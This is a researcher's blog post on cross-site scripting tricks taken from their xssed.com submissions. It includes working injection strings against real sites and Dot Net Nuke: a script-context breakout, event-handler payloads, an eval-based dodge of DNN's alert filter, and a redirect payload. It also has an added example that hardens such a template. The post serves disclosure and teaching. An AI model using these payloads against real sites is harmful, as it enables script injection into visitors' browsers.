Some XSS Tricks

I have submitted some XSS vulnerabilities to xssed.com under these names:

BugReport.ir (before the soroush.secproject.com website)

and

Soroush.SecProject.Com (nowadays)

Some of these XSSes are interesting because of the tricks they use, and I want to describe some of those tricks here:

1- Inserting JavaScript code inside an existing script. To inject arbitrary JavaScript properly, we must first insert something that closes the left side of the existing JavaScript, then insert our own JavaScript, and finally reopen the right side of the existing code so that no JavaScript syntax error occurs.

As you can see in "http://www.xssed.com/mirror/39834/", the XSS query is:

?sx="});};document.write('This is XSS test – BugReport.ir');alert('Safe XSS BugReport.ir');function startVideoPlayer(){getFailQS({destURL:"",show:"

In this query, I first closed the defined function with ["});};], then inserted my arbitrary script. After that, I used [function startVideoPlayer(){getFailQS({destURL:"",show:"] to open a new function that completes the right side of the code and prevents a JavaScript error.

You can see some other examples of this group:

http://www.xssed.com/mirror/41138/

http://www.xssed.com/mirror/41800/

http://www.xssed.com/mirror/55622/
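As an added example (not code from the original post or from the affected site), here is the script-context injection behind trick 1 as a constructed naive template next to a hardened one. The startVideoPlayer/getFailQS names come from the mirrored page; the template text, the probe/exercise harness, the payload and the toScriptLiteral helper are my own assumptions.

```javascript
// Added example, not code from the original post or the affected site: the
// script-context injection behind trick 1, as a naive template beside a
// hardened one. startVideoPlayer/getFailQS are the names visible in the
// mirrored page; the template and the payload below are constructed.

// Naive: the query value is spliced straight into a JS string literal, so a
// value beginning with "}); closes the literal, the call and the function,
// and everything after it is parsed as new top-level statements.
function renderNaive(sx) {
  return 'function startVideoPlayer(){getFailQS({destURL:"",show:"' +
    sx + '"});};';
}

// Hardened: emit the value as a JSON string literal, then escape what JSON
// leaves raw but matters inside a <script> block: < and > (so "</script>"
// in the data cannot end the block), & (harmless here, needed if the literal
// is reused in an attribute) and U+2028/U+2029 (line terminators in old engines).
function toScriptLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(sx) {
  return 'function startVideoPlayer(){getFailQS({destURL:"",show:' +
    toScriptLiteral(sx) + '});};';
}

// Harness: run a rendered script with stub getFailQS/probe functions and
// report what reached the call as data and whether an injected statement ran.
function exercise(rendered) {
  const r = { show: undefined, injectedRan: false, syntaxError: false };
  try {
    const fn = new Function('getFailQS', 'probe',
      rendered + ';startVideoPlayer();');
    fn(function (opts) { r.show = opts.show; },
       function () { r.injectedRan = true; });
  } catch (e) {
    if (e instanceof SyntaxError) r.syntaxError = true; else throw e;
  }
  return r;
}

// Constructed payload in the shape of the post's query: close the left
// side, run one statement, reopen the right side.
const PAYLOAD =
  '"});};probe();function startVideoPlayer(){getFailQS({destURL:"",show:"';
```

With the naive template the probe runs and getFailQS receives an empty string; with the hardened one the probe never runs and the whole value reaches getFailQS as data.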

2- Inserting JavaScript code in another format. Sometimes we can insert our JavaScript code through some other form of input, such as Base64. In this case we must look at the algorithms that process the inputs.

As you can see in "http://www.xssed.com/mirror/55624/", I inserted a Base64 string in order to perform the XSS attack.

3- Using the techniques from http://ha.ckers.org/xss.html. There is always something new and fantastic in this XSS cheat sheet! I learned many things from it.

Example of bypassing filters: "http://www.xssed.com/mirror/56197/"

4- Use your own ideas to insert your code. We must be creative in performing XSS. For example, in "http://www.xssed.com/mirror/56651/" I could not insert any string into my alert() function, so I inserted something into the title of the page and then read it back in my alert() function. Obviously, I could have used the eval() function to execute code by this method.

?wrd=Tested in Mozilla (Onmouseover) — IRSDL is HERE — Soroush.SecProject.Com — Another XSS Trick in Yahoo&prn=[irsdl]&pth=test&opt=onmouseover%3dalert(window.document.title.substring(15)) onmouseout%3dalert(/SeeYou/)

Another example is "http://www.xssed.com/mirror/40384/", which is based on "http://www.bugreport.ir/index_38.htm":

[DNN URL]/Default.aspx/"onmouseover="x='al';x=x+'ert(/WWW.BugReport.IR/)';eval(x);alert().aspx

In this XSS, I used a feature of .NET, the "slash after .aspx", to change the PATH_INFO parameter in the server variables. Because Dot Net Nuke (DNN) used PATH_INFO instead of the URL parameter, the path was inserted into the default.aspx page without any checking, so I inserted an "onmouseover" event there. But there was a problem with the alert() function: DNN recognized it and removed it together with the whole string after it! So I inserted the alert() call as a string into the "x" variable and then evaluated it with the eval() function. Another problem was that DNN needed ".aspx" at the end of the request (before the GET parameters)! So I appended "alert().aspx" to the end of the query, knowing that DNN would remove it together with everything after it.

Moreover, you can see in "http://www.bugreport.ir/index_38.htm" that I used another query:

http://[DNN URL]/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive';

In this example I had to use a ":" for "http://www.bugreport.ir/?archive", but I could not insert it before the "?" because IIS returned an error (":" is used to indicate a port). So I put ".aspx?" in a temporary variable "a" in order to: 1- have ".aspx" at the end of the query (before the GET parameters), and 2- be able to insert the ":" of "http://" after the "?".

Note: I could not use "onmouseover" after the "?" because the double quotation mark in the GET parameter was replaced by %22.

Good Luck.